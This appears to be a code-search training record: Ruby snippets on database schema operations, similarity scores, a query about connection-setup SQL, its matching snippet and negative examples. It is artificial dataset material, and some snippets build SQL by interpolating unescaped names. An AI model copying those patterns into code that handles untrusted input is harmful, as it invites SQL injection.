"def validate_query_table_column(query, table, column_name, allowed)\n validate_query(query)\n validate_table(table)\n validate_name(column_name, allowed)\n end",
"def rename_column(table_name, column_name, new_column_name)\n execute \"exec sp_rename '#{table_name}.#{column_name}', '#{new_column_name}'\"\n end",
"def up\n rename_column TABLE_NAME, OLD_COLUMN_NAME, NEW_COLUMN_NAME\n end",
"def up\n rename_column TABLE_NAME, OLD_COLUMN_NAME, NEW_COLUMN_NAME\n end",
"def chrono_rename_temporal_indexes(name, new_name)\n on_temporal_schema do\n temporal_indexes = indexes(new_name)\n temporal_indexes.map(&:name).each do |old_idx_name|\n if old_idx_name =~ /^index_#{name}_on_(?<columns>.+)/\n new_idx_name = \"index_#{new_name}_on_#{$~['columns']}\"\n execute \"ALTER INDEX #{old_idx_name} RENAME TO #{new_idx_name}\"\n end\n end\n end\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def incompatible_constraint(attribute_names, options = {}, &block)\n constraint = IncompatibleConstraint.new(self, attribute_names, options, &block)\n attribute_names.collect { |a| attribute_by_name(a) }.each do |a|\n error(\"Incompatible constraint #{constraint.name} on #{self.name} has an illegal non nullable attribute\") if !a.nullable?\n end\n add_unique_to_set(\"incompatible\", constraint, @incompatible_constraints)\n end",
"def rename(a, b)\n @@__name_sets[@@__defining][b] = :\"__#{a}\"\n @@__name_sets[:original][a] = :\"__#{a}\"\n\n class<<self\n self\n end.class_eval do\n alias_method :\"__#{a}\", a\n remove_method a\n end\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def set_column_conflict!(column)\n @set_column_conflicts[:\"#{column}=\"] = @set_column_conflicts[\"#{column}=\"] = column.to_sym\n end",
"def rename_columns(table_name, columns_old_new_create)\n temporary_table_name = \"#{table_name}_temp\"\n\n DataMapper::Transaction.new(adapter).commit do\n adapter.execute(\n \"ALTER TABLE #{quote table_name} \"\\\n \"RENAME TO #{quote temporary_table_name}\"\n )\n\n create_table table_name do\n columns_old_new_create.each do |_old, new, *options|\n column new, *options\n end\n end\n\n columns_old = columns_old_new_create.map { |c| quote c[0] }\n columns_new = columns_old_new_create.map { |c| quote c[1] }\n\n adapter.execute(\n \"INSERT INTO #{quote table_name}\" +\n \"(#{columns_new.join(',')}) \" +\n \"SELECT #{columns_old.join(',')} \" +\n \"FROM #{quote temporary_table_name}\")\n\n drop_table temporary_table_name\n end\n end",
"def rename_column(table_name, column_name, new_column_name) #:nodoc:\n clear_cache!\n execute \"ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def apply_schema_transformations\n # replace_exclusive_indicators_by_discriminators\n end",
"def move_unique_constraints\n unique_constraints = []\n\n # Removes the ADD CONSTRAINT statements and stores their info.\n dump.gsub!(/^-- Name: [\\w\\s]+?(?<name>\\w+); Type: CONSTRAINT[\\s-]+ALTER TABLE ONLY (?<table>[\\w.]+)\\s+ADD CONSTRAINT \\k<name> UNIQUE (?<columns>[^;]+);$/) do\n unique_constraints.push([$LAST_MATCH_INFO[:table], $LAST_MATCH_INFO[:name], $LAST_MATCH_INFO[:columns]])\n\n ''\n end\n\n # Adds the UNIQUE contstraint to the table definitions.\n unique_constraints.each do |table, name, columns|\n dump.gsub!(/^(?<statement>CREATE TABLE #{table} \\(.*?\\);)/m) do\n constraint = \"CONSTRAINT #{name} UNIQUE #{columns}\"\n \"#{$LAST_MATCH_INFO[:statement].sub(/\\n\\);\\z/, \",\\n #{constraint}\\n);\")}\"\n end\n end\n end",
"def validate_column(column)\n unless column.is_a?(Symbol) || column.is_a?(Arel::Nodes::SqlLiteral)\n column = column.to_s\n unless /\\A\\w+(\\.\\w+)?\\z/i.match(column)\n warn \"[groupdate] Non-attribute argument: #{column}. Use Arel.sql() for known-safe values. This will raise an error in Groupdate 6\"\n end\n end\n column\n end",
"def validate_unique *colnames\n\t\t\tcolnames.each { |colname|\n\t\t\t\tds = self.class.where colname => send(colname)\n\t\t\t\tds.filter!(~{primary_key => send(primary_key)}) unless new?\n\t\t\t\tif ds.count > 0\n\t\t\t\t\terrors.add(colname, 'must be unique.')\n\t\t\t\tend\n\t\t\t}\n\t\tend",
"def functional_update_schema # abstract\n raise 'abstract'\n end",
"def renameable(attribute = :name)\n define_method :renamed do |renamer|\n send :\"with_#{attribute}\", renamer.new_name_of(send(attribute))\n end\n end",
"def rename oldname, newname\n add \"mv #{oldname} #{newname}\", check_file(newname)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def test_keeping_default_and_notnull_constraints_on_change\n connection.create_table :testings do |t|\n t.column :title, :string\n end\n person_klass = Class.new(ActiveRecord::Base)\n person_klass.table_name = \"testings\"\n\n person_klass.connection.add_column \"testings\", \"wealth\", :integer, null: false, default: 99\n person_klass.reset_column_information\n assert_equal 99, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n assert_nothing_raised { person_klass.connection.execute(\"insert into testings (title) values ('tester')\") }\n\n # change column default to see that column doesn't lose its not null definition\n person_klass.connection.change_column_default \"testings\", \"wealth\", 100\n person_klass.reset_column_information\n assert_equal 100, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n\n # rename column to see that column doesn't lose its not null and/or default definition\n person_klass.connection.rename_column \"testings\", \"wealth\", \"money\"\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"wealth\"]\n assert_equal 100, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: false, default: 1000\n person_klass.reset_column_information\n assert_equal 1000, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column, make it nullable and clear default\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: true, default: nil\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal true, person_klass.columns_hash[\"money\"].null\n\n # change_column_null, make it not nullable and set null values to a default value\n person_klass.connection.execute(\"UPDATE testings SET money = NULL\")\n person_klass.connection.change_column_null \"testings\", \"money\", false, 2000\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal false, person_klass.columns_hash[\"money\"].null\n assert_equal 2000, connection.select_values(\"SELECT money FROM testings\").first.to_i\n end",
"def compress_index_name(name)\n method_index = 0\n new_name = name\n while new_name.length > 63 && method_index >= 0\n # ap \"[#{method_index}] #{new_name}\"\n case method_index\n when 0\n # change polymorphic index to just name\n table_part, column_part = new_name.split('_on_')\n columns = column_part.split('_and_')\n polys = columns.select{|e| e.include?('_type') && columns.include?(e.sub('_type','_id')) }\n if polys.any?\n polys.each do |poly|\n poly = poly.split('_').first\n columns[columns.index(\"#{poly}_type\")] = poly\n columns.delete(\"#{poly}_id\")\n end\n new_name = \"#{table_part}_on_#{columns.join(\"_and_\")}\"\n end\n method_index += 1\n when 1\n # change index to idx\n new_name = name.sub(\"index_\",\"ix_\")\n method_index += 1\n when 2\n # remove common strings from column names\n column_part = new_name.split('_on_').last\n columns = column_part.split('_and_')\n if columns.size > 1 && (common_str = longest_common_substr(columns))\n common_str = common_str.sub(/_at|_id/,'')\n if common_str.size > 2\n ap \"common_str: #{common_str}\"\n new_name = new_name.gsub(common_str, '')\n end\n end\n method_index += 1\n when 3\n # remove the leading parts of the table name\n table_name = new_name.match(/ix_(.*)_on.*/)[1]\n parts = table_name.split('_')\n if parts.size > 1\n parts.shift\n new_table_name = parts.join('_')\n new_name = new_name.sub(\"ix_#{table_name}_on\",\"ix_#{new_table_name}_on\")\n else\n method_index += 1\n end\n when 4\n # hash the columns used in the index\n columns = new_name.split('_on_').last\n hash = Digest::MD5.base64digest(columns)[0..-3]\n new_name = new_name.sub(columns, hash) \n method_index += 1\n when 5\n # change table name to hash\n table_name = new_name.match(/ix_(.*)_on.*/)[1]\n hash = Digest::MD5.base64digest(table_name)[0..-3]\n if table_name.size > hash.size\n new_name = new_name.sub(table_name, hash)\n end\n method_index += 1\n else\n method_index = -99\n end\n end\n new_name\n end",
"def handle_duplicate_columns(cols)\n message = \"#{caller(*CALLER_ARGS).first}: One or more duplicate columns present in #{cols.inspect}\"\n\n case duplicate_columns_handler_type(cols)\n when :raise\n raise DuplicateColumnError, message\n when :warn\n warn message\n end\n end",
"def sanitize_columns!\n column_names = @db_connection.schema(@current_name, {:schema => @target_schema}).map{ |s| s[0].to_s }\n sanitize(column_names)\n end",
"def database_specific_error_class(exception, opts)\n case exception.errno\n when 1048\n NotNullConstraintViolation\n when 1062\n UniqueConstraintViolation\n when 1451, 1452\n ForeignKeyConstraintViolation\n else\n super\n end\n end",
"def rename!(*arguments)\n Hash[*arguments.flatten].each_pair do |from,to|\n if fields.has_key?(from) && !fields.has_key?(to)\n fields[to] = fields[from]\n fields.delete(from)\n end\n end\n self\n end",
"def validate_slug_columns\n raise ArgumentError, \"Source column '#{self.slug_source}' does not exist!\" if !self.respond_to?(self.slug_source)\n raise ArgumentError, \"Slug column '#{self.slug_column}' does not exist!\" if !self.respond_to?(\"#{self.slug_column}=\")\n end",
"def rename(renames)\n operations = renames.inject({}) do |ops, (old_name, new_name)|\n ops[old_name] = new_name.to_s\n ops\n end\n view.update_many(\"$rename\" => collect_operations(operations))\n end",
"def rename_comparison(old_name, new_name)\n if @handle.ptr == nil\n raise \"this is disposed\"\n end\n result = Native.RunEditor_rename_comparison(@handle.ptr, old_name, new_name)\n result\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def columnName_to_fieldname (name)\n return name.downcase.gsub(' ','-')\nend",
"def test_some_invalid_columns\n process :nasty_columns_1\n assert_response :success\n\n assert_deprecated_assertion { assert_invalid_record 'company' }\n assert_deprecated_assertion { assert_invalid_column_on_record 'company', 'rating' }\n assert_deprecated_assertion { assert_valid_column_on_record 'company', 'name' }\n assert_deprecated_assertion { assert_valid_column_on_record 'company', %w(name id) }\n end",
"def validate_columns\n columns.each do |name|\n if !column_available?(name)\n errors.add column_label_for(name), :inclusion\n end\n end if columns.present?\n end",
"def rename_table_sql(name, new_name)\n \"ALTER TABLE #{quote_schema_table(name)} RENAME TO #{quote_identifier(schema_and_table(new_name).last)}\"\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def renamenx(old_name, new_name); end",
"def renamenx(old_name, new_name); end",
"def column_numerical_constraints(column, options)\n validators = column.active_record_class.validators.select do |v|\n v.is_a?(ActiveModel::Validations::NumericalityValidator) &&\n v.attributes.include?(column.name) &&\n !v.options[:if] && !v.options[:unless]\n end\n\n equal_validator = validators.find { |v| v.options[:equal_to] }\n # If there is equal_to constraint - use it (unless otherwise specified by user)\n if equal_validator && !(options[:min] || options[:max])\n equal_to = equal_validator.options[:equal_to]\n return {min: equal_to, max: equal_to}\n end\n\n numerical_constraints = {}\n\n # find minimum and maximum from validators\n # we can safely modify :min and :max by 1 for :greater_tnan or :less_than value only for integer values\n only_integer = column.column.type == :integer if column.column\n only_integer ||= validators.find { |v| v.options[:only_integer] }.present?\n margin = only_integer ? 1 : 0\n\n # Minimum\n unless options[:min]\n min = validators.map { |v| v.options[:greater_than_or_equal_to] }.compact.max\n greater_than = validators.map { |v| v.options[:greater_than] }.compact.max\n numerical_constraints[:min] = [min, (greater_than + margin if greater_than)].compact.max\n end\n\n # Maximum\n unless options[:max]\n max = validators.map { |v| v.options[:less_than_or_equal_to] }.compact.min\n less_than = validators.map { |v| v.options[:less_than] }.compact.min\n numerical_constraints[:max] = [max, (less_than - margin if less_than)].compact.min\n end\n\n # Set step = 2 for column values restricted to be odd or even (but only if minimum is set)\n unless options[:step]\n only_odd_valid = validators.any? { |v| v.options[:odd] }\n only_even_valid = validators.any? { |v| v.options[:even] } unless only_odd_valid\n if !only_integer\n numerical_constraints[:step] ||= \"0.#{'0' * (column.column.scale - 1)}1\" if column.column&.scale.to_i.positive?\n elsif options[:min] && options[:min].respond_to?(:even?) && (only_odd_valid || only_even_valid)\n numerical_constraints[:step] = 2\n numerical_constraints[:min] += 1 if only_odd_valid && options[:min].even?\n numerical_constraints[:min] += 1 if only_even_valid && options[:min].odd?\n end\n numerical_constraints[:step] ||= 'any' unless only_integer\n end\n\n numerical_constraints\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def validate_on_create=(_arg0); end",
"def rename_column(table_name, column_name, new_column_name, options = {}) #:nodoc:\n column_info = select_one(\"SHOW FULL FIELDS FROM #{table_name} LIKE '#{column_name}'\")\n current_type = column_info[\"Type\"]\n options[:comment] ||= column_info[\"Comment\"]\n sql = \"ALTER TABLE #{table_name} CHANGE #{column_name} #{new_column_name} #{current_type}\"\n sql << \" COMMENT #{quote(options[:comment])}\" unless options[:comment].blank?\n execute sql\n end",
"def rename_field dirty_key, opts={}\n do_token = opts[:auto_tokenize]\n do_token = self.auto_tokenize? if do_token.nil?\n to_field = opts[:field_renames] || self.field_renames\n clean_key = format_field(dirty_key)\n field_key = to_field[clean_key]\n field_key = do_token if field_key.nil? and (not do_token.nil?)\n case field_key\n when Symbol then field_key\n when true then clean_key.to_sym\n when false then clean_key\n else\n raise ArgumentError, \"Unknown Auto Rename Field Value: #{clean_key}\"\n end\n end",
"def chrono_rename_history_indexes(name, new_name)\n on_history_schema do\n standard_index_names = %w(\n inherit_pkey instance_history pkey\n recorded_at timeline_consistency )\n\n old_names = temporal_index_names(name, :validity) +\n standard_index_names.map {|i| [name, i].join('_') }\n\n new_names = temporal_index_names(new_name, :validity) +\n standard_index_names.map {|i| [new_name, i].join('_') }\n\n old_names.zip(new_names).each do |old, new|\n execute \"ALTER INDEX #{old} RENAME TO #{new}\"\n end\n end\n end",
"def column_definition_unique_sql(sql, column)\n if column[:unique]\n if name = column[:unique_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << ' ' << unique_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:unique_deferrable])\n end\n end",
"def move_to_database(column1, column2)\n # column1 and column2 will be symbols\n if Object.const_defined?(column1.to_s.capitalize) # yeilds column\n @model_1 = Object.const_get(column1.to_s.capitalize)\n else\n set_error_message(\"Model \\\"#{column1.to_s.capitalize}\\\" not defined\")\n end\n \n if Object.const_defined?(column2.to_s.capitalize) # yeilds column \n @model_2 = Object.const_get(column2.to_s.capitalize)\n else\n set_error_message(\"Model \\\"#{column2.to_s.capitalize}\\\" not defined\")\n end\n puts self.error_messages.inspect\n end",
"def validator_for(constraint_name)\n validator_name_for(constraint_name).safe_constantize\n end",
"def change_column(table_name, name, new_type)\n column_functional(table_name) do\n change_table_column(name, new_type)\n end\n end"
] |
[
"0.6728584",
"0.65458584",
"0.5705936",
"0.5677713",
"0.56549233",
"0.5590001",
"0.55832726",
"0.55148995",
"0.55096465",
"0.5468966",
"0.5393673",
"0.53134495",
"0.531104",
"0.5295988",
"0.528086",
"0.5262339",
"0.52330846",
"0.5218797",
"0.5215299",
"0.5191192",
"0.5191192",
"0.5169561",
"0.51328546",
"0.5079588",
"0.50703007",
"0.50604784",
"0.50604784",
"0.50498855",
"0.5041326",
"0.5038121",
"0.50030315",
"0.49979284",
"0.49976417",
"0.4994975",
"0.4976363",
"0.49440807",
"0.49336645",
"0.49288058",
"0.49063766",
"0.49039277",
"0.49039277",
"0.48825213",
"0.48730063",
"0.4872136",
"0.48593396",
"0.4853418",
"0.4853418",
"0.48502713",
"0.48402357",
"0.48109117",
"0.48089665",
"0.48089665",
"0.48002625",
"0.4792394",
"0.47872138",
"0.47717375",
"0.47669688",
"0.47477448",
"0.47467667",
"0.47467667",
"0.47467667",
"0.47368073",
"0.47322285",
"0.47088653",
"0.47054458",
"0.47053272",
"0.46976933",
"0.46551755",
"0.46479607",
"0.46478304",
"0.46438974",
"0.46413884",
"0.4635225",
"0.46042183",
"0.46000877",
"0.4597812",
"0.45944288",
"0.45910093",
"0.4590794",
"0.45871827",
"0.45870298",
"0.4585924",
"0.458294",
"0.45751345",
"0.4573348",
"0.45446733",
"0.45417404",
"0.4532974",
"0.4532974",
"0.4532295",
"0.45262346",
"0.45262346",
"0.45107555",
"0.4502549",
"0.44959712",
"0.44933188",
"0.4488058",
"0.44857103",
"0.44774586",
"0.4476898"
] |
0.64177334
|
2
|
The SQL queries to execute when starting a new connection.
|
def connection_configuration_sqls(opts=@opts)
sqls = []
sqls << "SET standard_conforming_strings = ON" if typecast_value_boolean(opts.fetch(:force_standard_strings, true))
cmm = opts.fetch(:client_min_messages, :warning)
if cmm && !cmm.to_s.empty?
cmm = cmm.to_s.upcase.strip
unless VALID_CLIENT_MIN_MESSAGES.include?(cmm)
raise Error, "Unsupported client_min_messages setting: #{cmm}"
end
sqls << "SET client_min_messages = '#{cmm.to_s.upcase}'"
end
if search_path = opts[:search_path]
case search_path
when String
search_path = search_path.split(",").map(&:strip)
when Array
# nil
else
raise Error, "unrecognized value for :search_path option: #{search_path.inspect}"
end
sqls << "SET search_path = #{search_path.map{|s| "\"#{s.gsub('"', '""')}\""}.join(',')}"
end
sqls
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sqls\n @mutex.synchronize do\n s = @sqls.dup\n @sqls.clear\n s\n end\n end",
"def prepare_sql_statements\n begin\n databases.each do |db|\n create_query[db][0] = create_query[db][0] + \" \" + create_query[db][1]\n create_query[db].delete_at(1)\n create_query[db] = create_query[db].join(\", \")\n create_query[db] << \");\"\n end\n rescue TypeError => e\n end\n end",
"def sql\n Slacker.sql(self)\n end",
"def connection_execute_method\n :query\n end",
"def connection_execute_method\n :query\n end",
"def perform_query\n Rails.logger.info queries.to_sql\n queries\n end",
"def queries\n qrs = []\n self.each_query {|qr| qrs << qr }\n qrs\n end",
"def cs_starter\n # make_batched_queries\n make_standard_queries\n end",
"def initial_query; end",
"def sql\n @context.sql\n end",
"def execute sql\n db[sql]\n end",
"def snapshots_redact_sql_queries; end",
"def query(statement, *params) #Use of splat(*) parameter used with methods where you don't know how many arguements it will take \n @logger.info \"#{statement}: #{params}\" #Funtionailty for the ability to see in the local host terminal d-bug output from sinatra showing all of the requests it's accepting; this will alow us to see the SQL queries that are being executed in the db to help troubleshoot \n @db.exec_params(statement, params)\n end",
"def snapshots_redact_sql_queries=(_arg0); end",
"def sql\n @sql ||= begin\n bind_params = []\n i = 1\n (selector_keys.length + setter_keys.length).times do\n bind_params << \"$#{i}\"\n i += 1\n end\n hstore_delete_handlers.length.times do\n bind_params << \"$#{i}::text[]\"\n i += 1\n end\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql\n @sql ||= begin\n bind_params = []\n i = 1\n (selector_keys.length + setter_keys.length).times do\n bind_params << \"$#{i}\"\n i += 1\n end\n hstore_delete_handlers.length.times do\n bind_params << \"$#{i}::text[]\"\n i += 1\n end\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql\n @sql ||= begin\n bind_params = []\n 1.upto(selector_keys.length + setter_keys.length) { |i| bind_params << \"$#{i}\" }\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql_modes; end",
"def sql_statement_all\n @sql_statement_all ||=\n <<-SQL\n SELECT\n applications.id AS id,\n teams.name AS team_name,\n projects.name AS project_name,\n (application_data -> :project_id)::int AS project_id,\n application_data -> :signed_off_at AS signed_off_at,\n (application_data -> :signed_off_by)::int AS signed_off_by,\n application_data -> :mentor_fav AS mentor_fav,\n CASE WHEN :project_id::text = 'project1_id' THEN 1 ELSE 2 END AS choice\n FROM applications\n INNER JOIN teams\n ON teams.id = applications.team_id\n INNER JOIN projects\n ON projects.id::text = applications.application_data -> :project_id\n WHERE (application_data -> :project_id)::int IN (:project_ids)\n AND applications.season_id = :season_id;\n SQL\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def execute(sql)\n @logger.debug(\"SQL: #{sql}\") if @logger\n retrieve_connection.query(sql)\n end",
"def index\n @sql_queries = SqlQuery.all\n end",
"def sql\n @stmt_api.sql\n end",
"def custom_sql(q)\n query = q + ';' unless q =~ /;$/\n query = @db_connection.query(\"#{query}\")\n query.each { |x| print_line(\"#{x.join(',')}\") } unless query.empty?\n end",
"def query(sql)\n database.execute2(sql)\n end",
"def add_queries\n add_general_query\n add_title_query\n add_creators_query\n add_series_query\n add_collected_query\n add_tag_name_query\n end",
"def query(sql, name = nil) #:nodoc:\n log(sql, name) do\n @connection.execute(sql).rows\n end\n end",
"def info_sql\n INFO_SQL\n end",
"def exec_query_dblink_connect\n execute_remote(query_enable_dblink + query_dblink_connect)\n end",
"def execute\n # build the query string\n # run the query\n # return the results\n end",
"def add_sql_data\n sql = {}\n databases.each do |db|\n sql[db] = {}\n sql[db][:create_query] = create_queries[db]\n sql[db][:import_query] = import_queries[db]\n end\n return sql\n end",
"def query sql\n result = db[sql].all\n return result\n end",
"def all\n\t\tquery.execute\n end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def multiple_query sql\n splited_sql = sql.split(';')\n splited_sql.each do |each_sql|\n query(each_sql)\n end\n end",
"def extract_sql_queries\n sql_queries = Lograge::Sql.store[:lograge_sql_queries]\n return {} unless sql_queries\n\n Lograge::Sql.store[:lograge_sql_queries] = nil\n {\n sql_queries: Lograge::Sql.formatter.call(sql_queries),\n sql_queries_count: sql_queries.length\n }\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def execute_query(query)\n ActiveRecord::Base.connection.select_all(query)\n end",
"def query(sql, args=nil)\n args = args.map{|v| @db.bound_variable_arg(v, self)} if args\n check_disconnect_errors{super}\n end",
"def sql_query(sqlquery)\n\t\tActiveRecord::Base.connection.select_all(sqlquery)\n\tend",
"def exec_query(sql, name = 'SQL', binds = [])\n if name == :skip_logging\n #execute(sql, name)\n hash_query(sql, name, binds)\n else\n log(sql, name) do\n #execute(sql, name)\n hash_query(sql, name, binds)\n end\n end \n end",
"def exec(sql)\n Logging.with_logged_query self, sql do\n raw_connection.exec sql\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def do_execute(sql, name = 'SQL')\n log(sql, name) { raw_connection_do(sql) }\n end",
"def log_connection_execute(conn, sql)\n conn.execute(sql)\n end",
"def log_sql\n @opts[:log_sql]\n end",
"def setup_connection(conn)\n conn = super(conn)\n statement(conn) do |stmt|\n connection_configuration_sqls.each{|sql| log_yield(sql){stmt.execute(sql)}}\n end\n conn\n end",
"def sql\n @parser.sql\n end",
"def sql\n @parser.sql\n end",
"def execute_sql\n ActiveRecord::Base.connection.execute(@sql)\n end",
"def query\n end",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def run\n basecmd = []\n basecmd << command(:psql)\n basecmd << \"-U\" unless @resource[:role].nil?\n basecmd << \"#{@resource[:role]}\" unless @resource[:role].nil?\n basecmd << \"-d\" unless @resource[:database].nil?\n basecmd << \"#{@resource[:database]}\" unless @resource[:database].nil?\n \n # We execute by default.\n execute = true\n unless @resource[:query].nil?\n cmd = basecmd\n cmd << '-qAtc'\n \n sqlcmd = \"#{@resource[:query]}\"\n \n cmd << sqlcmd\n \n raw, status = Puppet::Util::SUIDManager.run_and_capture(cmd, 'postgres')\n if status == 0\n execute = false # Got an ok result, so we'll evaluate.\n\n if ! @resource[:rows].nil?\n target_rows = Integer(@resource[:rows].gsub(/[^\\d]/,''))\n operand = @resource[:rows].gsub(/[\\d]/,'').chomp.downcase\n returned_rows = (raw.length <= 0 ? 0 : raw.lines.count)\n if operand.match(/lte|less than or equal|<=/)\n execute = true if returned_rows <= target_rows\n elsif operand.match(/gte|greater than or equal|>=/)\n execute = true if returned_rows >= target_rows\n elsif operand.match(/lt|less than|</)\n execute = true if returned_rows < target_rows \n elsif operand.match(/gt|greater than|>/)\n execute = true if returned_rows > target_rows\n else\n execute = true if returned_rows == target_rows\n end\n end\n else\n # We stop an execution if rows or result params are set\n # on the assumption that if you want to evaluate against criteria like those\n # you want to actually do so.\n execute = false if (! @resource[:rows].nil? or ! @resource[:result].nil?)\n end\n end\n \n unless execute == false\n cmd = basecmd\n if ! @resource[:command].nil?\n cmd << '-qAtc'\n \n sqlcmd = \"#{@resource[:command]}\"\n \n cmd << sqlcmd \n elsif ! @resource[:file].nil?\n cmd << '-qAtf'\n \n sqlcmd = \"#{@resource[:file]}\"\n \n cmd << sqlcmd\n else\n # Right now we send a warning. This should still trigger a refresh if you\n # want to use queries to conditionally do things for some insane reason.\n self.warning(\"Nothing to do.\")\n end\n \n raw, status = Puppet::Util::SUIDManager.run_and_capture(cmd, 'postgres')\n if status != 0\n self.fail(\"Error executing SQL - result #{raw}\")\n else\n @ran = true\n end\n else\n self.fail(\"Execution criteria failed. Failing to prevent dependant resources from executing.\")\n end\n end",
"def query; end",
"def log_connection_execute(conn, sql)\n conn.execute(sql)\n end",
"def exec__psql_cli_or_db_queries psql_db, db_queries=[nil]\n batch = psql_db_batch__cli_or_queries psql_db, db_queries\n batch_commands batch\n end",
"def source_sql\n system \"psql -d #{@base_name} -f #{@sql_path}\"\n end",
"def initialize(args)\n @sql = args[:sql] || nil\n \n #Mandatory args:\n req(:required => [:connection_name],\n :args_object => args)\n @dbh = Mysqladmin::Pool.connections[args[:connection_name]][:dbh]\n end",
"def initialize( db, sql )\n @db = db\n @sql = sql\n commence\n end",
"def connect(opts)\n c = super\n connection_pragmas.each{|s| log_connection_yield(s, c){c.execute(s)}}\n c\n end",
